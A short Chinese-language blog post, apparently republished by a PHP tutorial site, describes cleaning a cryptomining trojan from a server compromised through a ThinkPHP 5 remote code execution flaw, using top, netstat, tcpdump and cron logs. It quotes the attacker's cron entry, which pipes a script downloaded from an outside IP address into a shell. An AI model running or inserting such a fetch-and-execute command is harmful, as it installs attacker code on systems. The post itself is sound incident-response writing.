掛馬清除經驗：處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬

下面由thinkphp教學專欄為大家介紹處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬的方法，希望對需要的朋友有所幫助！

記一次掛馬清除經驗：處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬

##昨天發現一台伺服器突然慢了top 顯示幾個行程100%以上的cpu使用

執行指令為:

/tmp/php  -s /tmp/p2.conf

基本上可以確定是被掛馬了

下一步確定來源

last 沒有登陸記錄

先幹掉這幾個進程，但是幾分鐘之後又出現了

#先看看這個木馬想幹什麼吧

netstat 看到這個木馬開啟了一個連接埠和國外的某個ip建立了連接

但是tcpdump了一小會兒沒有發現任何資料傳遞

這他是想幹啥？

繼續查看日誌吧

在cron日誌中發現了www用戶有一個crontab定時操作基本上就是這個問題了

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

順著下載了幾個問題，看了看應該是個挖礦的木馬程式

伺服器上的www用戶是安裝lnmp 創建的，看了來源很可能就是web漏洞了。

再看/tmp下的php的權限就是www的

查看lnmp下幾個站的日誌 發現是利用thinkphp 5最近爆出的遠端程式碼執行漏洞

漏洞細節：https://nosec.org/home/detail/2050.html

修復問題解決

但這個網站是測試網站 埠監聽的是8083  ，現在駭客能開始嗅探非常規端口了？

來源：https://www.simapple.com/425.html

#相關推薦：

最新的10個thinkphp影片教學

以上是掛馬清除經驗：處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬的詳細內容。更多資訊請關注PHP中文網其他相關文章！